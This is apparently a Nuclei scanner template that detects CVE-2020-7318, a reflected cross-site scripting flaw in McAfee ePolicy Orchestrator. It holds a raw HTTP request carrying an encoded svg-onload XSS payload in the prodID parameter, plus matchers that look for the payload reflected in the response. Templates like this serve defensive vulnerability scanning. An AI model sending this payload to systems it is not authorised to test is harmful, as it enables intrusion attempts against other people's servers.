nuclei-templates/cves/2020/CVE-2020-7318.yaml

38 lines
1.0 KiB
YAML

id: CVE-2020-7318
info:
name: McAfee ePolicy Orchestrator Reflected XSS
author: dwisiswant0
severity: medium
description: |
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
script or HTML via multiple parameters where the administrator's entries
were not correctly sanitized.
reference:
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
tags: cve,cve2020,xss
requests:
- raw:
- |
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "Policy Name"
- "'\"><svg/onload=alert(document.domain)>"
condition: and
part: body